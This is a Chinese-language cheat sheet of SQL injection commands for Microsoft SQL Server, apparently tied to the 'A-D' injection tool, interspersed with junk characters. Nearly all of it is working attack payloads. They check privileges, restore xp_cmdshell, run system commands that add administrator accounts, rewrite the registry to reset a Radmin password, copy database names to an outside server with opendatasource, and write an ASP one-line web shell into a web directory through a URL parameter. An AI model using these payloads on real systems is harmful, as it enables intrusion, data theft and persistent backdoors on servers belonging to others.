阿D常用的一些注入命令
2 O8 m' y) V5 V& Q+ G- Q7 X//看看是什么权限的2 G, Y) N R0 N3 _/ `) T9 I K+ q
and 1=(Select IS_MEMBER('db_owner'))
1 ]. A! f! X- [And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--" ]4 s, a1 Z& n3 \0 x1 g" @0 Q
7 I( Z6 S1 E+ \- a
//检测是否有读取某数据库的权限" W& @, d0 H- I, q: V
and 1= (Select HAS_DBACCESS('master'))
$ V" }. ]7 N3 U7 w; W0 I4 `4 Z) gAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
9 F& ]! G5 M3 J6 t3 f. w# N. d9 m$ W3 H
( g6 I# q9 t; |9 R6 O* o2 A5 C7 R
数字类型
' d0 u( S9 Z* m9 y" R/ o. I' g+ oand char(124)%2Buser%2Bchar(124)=0. b3 G+ Z8 s6 o1 F4 ~' X9 g
1 S( e, U& B- y9 u) E& ?" M" [7 `字符类型
' d6 Y, L- e) q6 V6 u' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 s! U9 E( S6 E3 F2 K9 ]
, Y/ M4 j! S5 j0 o9 Q7 m搜索类型/ J: e# @" b$ r# j3 j
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
+ I" P5 D8 w7 E3 S8 g7 x- Z. I$ ]: p0 V
爆用户名
; O: g, {4 k# s2 P& ^" Cand user>04 S4 g) N! S! p7 Y/ m8 Q0 ?9 R* C
' and user>0 and ''='* u& [9 e* V# @2 |3 ^
# {7 k7 |0 c5 @* G! z+ D检测是否为SA权限# [7 g; q( P8 U v6 |$ L
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--- s- x; j% m" [! _( I0 X1 M; k
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' V+ ] g2 u- V, m5 S' T7 K/ e8 a1 v* | V8 V' ~% E
检测是不是MSSQL数据库8 Y$ Y' W+ r# p3 w8 }
and exists (select * from sysobjects);--
! ~& v3 q9 ~0 ]: p4 l4 s
( r, ~5 }, b9 v" _( N检测是否支持多行' Q/ S4 I7 c; K. u1 {8 E1 G
;declare @d int;--
$ g. Z8 P% ]* ?( \* t/ ~+ K U3 Q/ r
! |, R+ n7 W+ i9 X恢复 xp_cmdshell% q3 g* }1 D, o2 v. q4 ]- [
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 J0 b& t1 k6 l) z" I; ^
& f S3 A: Q' u( l
* C% e! o" p$ |6 r$ K/ @2 S7 R8 Gselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') f0 \& O9 Y4 a
" Z' S( ^ i( `9 ` }2 b//-----------------------
; j5 Y- C: k) d; @* O// 执行命令
) m' R6 f G9 A& O//-----------------------
# f$ `- A0 `) K# m2 h首先开启沙盘模式:
% I1 P+ w2 @- B( `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',10 u3 i# T& ?* R+ M6 U* V( M
+ K& P! m- a8 }" Q4 c/ k! I( |然后利用jet.oledb执行系统命令/ |% y/ w2 w6 @' F) i2 i+ s) H& a/ V3 C
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')7 D+ y, l8 n" ]: ^3 T
& r/ f/ [& A- M6 r: u: j% P/ l
执行命令
. X9 {$ y2 J+ ~. N4 \7 z;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--0 ?5 h% I! a8 v- f5 R
: Z6 Y+ I: q/ n0 X0 i- \: j
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
9 S6 r2 R8 @, k# F/ h
* n6 N+ f1 A+ `) f) [% {; G判断xp_cmdshell扩展存储过程是否存在:% u/ \- ~' U& j: J* ?
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
9 M+ b- N& P% H6 x- ]" ]" F- F# E7 E5 G. w% I
写注册表
6 t& [0 \/ v: gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1' Z u5 C+ L' ^$ `% M2 t7 p
( N7 W3 l( y8 t% D9 g9 z
REG_SZ
6 k! c. r }; b1 `& K7 f( O7 `( k" u9 u/ x! d+ l0 ?- c* A2 c
读注册表. Q+ H" Q5 |$ Z4 J, n9 D
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'2 s4 u' u- N5 W4 t. M
4 s* j1 Q7 Y# U读取目录内容! A" h; m& f' n" J0 I" p
exec master..xp_dirtree 'c:\winnt\system32\',1,1
: D$ X ^* x, f- }' X& ~7 L; q! `* c& I7 A
2 p& Z7 S6 q2 ~
数据库备份
" @3 t/ X8 G1 mbackup database pubs to disk = 'c:\123.bak'
$ S. v- L L, r. O8 X+ [
- D* [! }& e C" J9 i//爆出长度
* {% x; ^. E( X1 F( JAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--, W8 l3 w1 ?& v4 M/ R
$ }4 v8 E G5 L) w( T \
; O0 x9 e- g* j% {+ U/ L
- k# {: Y2 U& h+ H( ~2 ?+ K Q8 Y更改sa口令方法:用sql综合利用工具连接后,执行命令:
9 S; I/ [# v7 I. R" bexec sp_password NULL,'新密码','sa'/ m6 S0 V2 e8 d: h
, W: b3 I, N" @6 I8 d# ?$ B添加和删除一个SA权限的用户test:5 _9 O3 r9 E4 o5 T5 O, n
exec master.dbo.sp_addlogin test,ptlove
& r5 i8 D" w P3 qexec master.dbo.sp_addsrvrolemember test,sysadmin
1 U, N# X: [7 L7 q* T$ }. l4 F& @! O3 y5 ]& J* T5 n
删除扩展存储过过程xp_cmdshell的语句:
; g3 z; N+ M* B. G5 y" Zexec sp_dropextendedproc 'xp_cmdshell'
8 z: u1 M5 s1 h1 ]3 m2 P0 H
( X. X" {9 p* ]6 ?3 t, K添加扩展存储过过程+ f$ V8 B( d& S' E+ o
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ; f( ]! [- j5 B/ a: L% ?
GRANT exec On xp_proxiedadata TO public 3 B/ v3 X+ a: i" c/ c: x
: C2 k& w6 [( x0 T8 W' |& N
6 a$ j2 Z1 W( B/ W停掉或激活某个服务。
2 O4 q! F# r) _3 j+ T' F$ f8 t' ]9 v5 W* h1 e) z2 M, Y2 H
exec master..xp_servicecontrol 'stop','schedule'; y" H2 S! K# U8 ^: O
exec master..xp_servicecontrol 'start','schedule'" Q+ a+ h& H7 i8 ~( F2 s
% ]/ T/ e/ o( ~/ l X) `7 l+ L- ]
dbo.xp_subdirs2 q6 ~7 _/ |0 ?- R8 X+ a, q/ _
! v8 J/ k6 R( I只列某个目录下的子目录。
+ U+ P8 q# B" S% Sxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'7 I$ \9 a# r4 C8 Q) c P, S
+ z( F Z \( J: b( U3 s7 u$ Fdbo.xp_makecab8 ]- g1 V1 v, y" O& _
+ Z$ M4 a4 S* W. Z& n* W5 e" ]) ~将目标多个档案压缩到某个目标档案之内。- y- x3 L' ]3 n; c) d" v
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。& F c4 q `" m! Z
9 m8 H" R3 h- j+ g' g9 H( z) odbo.xp_makecab
$ V0 h+ w+ L" p% ?( |0 A, l: J% q r'c:\test.cab','mszip',1," V, I% H& T: X+ H
'C:\Inetpub\wwwroot\SQLInject\login.asp',
* E3 Q* n! Y$ K0 g'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
" L2 D1 K& D/ i5 N J; [7 C/ ?+ H" Y1 o* i
xp_terminate_process& |% G* v" i% c+ _8 ]7 m. {5 d) P
3 E7 I9 |- f' D/ P9 X2 u2 g停掉某个执行中的程序,但赋予的参数是 Process ID。# `+ ?2 b9 g5 {# v
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
: F+ g) x1 {# c1 e1 H" A: X
2 K! P4 |% ?0 {! {9 T9 f- ?xp_terminate_process 2484% I7 ?) t5 w6 [/ c4 ]3 x7 {
, w" Y% R3 s; @0 {, _% P
xp_unpackcab
) O( G) X1 J$ M: e5 W6 ?9 X, d+ o1 T& x: w: D. D; f* {& e% o
解开压缩档。. F$ G' T* X V B0 g
9 g( b b- r: m7 q
xp_unpackcab 'c:\test.cab','c:\temp',1' O" r/ D# ]* n4 t0 J8 X8 ?6 a% J
* c" b; C1 P+ [1 _! w/ b8 O
2 m ]7 j6 i# w" ^
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
2 _+ U# _$ i# u* C: `) q1 n8 I7 A5 S
create database lcx;
; S" \0 s' V7 T1 ?# E- h2 v& {3 h" OCreate TABLE ku(name nvarchar(256) null);
3 K D6 G$ Z7 VCreate TABLE biao(id int NULL,name nvarchar(256) null);, O1 p. U' n2 ]
3 `8 ?. n! X& \1 {& O//得到数据库名
/ [6 V; ~5 w9 }; ]; {insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases" q0 c8 B* o, A: J5 p& ~+ }5 ~2 ?
5 ^0 f( N9 V/ p& O( E' A
7 H6 {8 Q* @. S8 z% B$ X8 }; }; J
//在Master中创建表,看看权限怎样
1 V& O; F6 W/ h XCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--) S" l- ^/ y# |
7 b, A+ k) o) L: K* s! n! Y8 t
用 sp_makewebtask直接在web目录里写入一句话马:
5 `! V' i' s8 s/ I1 A: \$ U" b; ihttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--4 [& X6 l5 ]' d9 W g' a, H8 Z
( i7 }( H1 W6 B. |& g/ x) f& w//更新表内容8 }7 C. h: H, |2 h9 C' M
Update films SET kind = 'Dramatic' Where id = 123
; @* ^* j2 |" L& u
# w" ~/ A% h2 m; ]4 T4 g//删除内容1 M9 _6 i9 {& z7 C
delete from table_name where Stockid = 3 |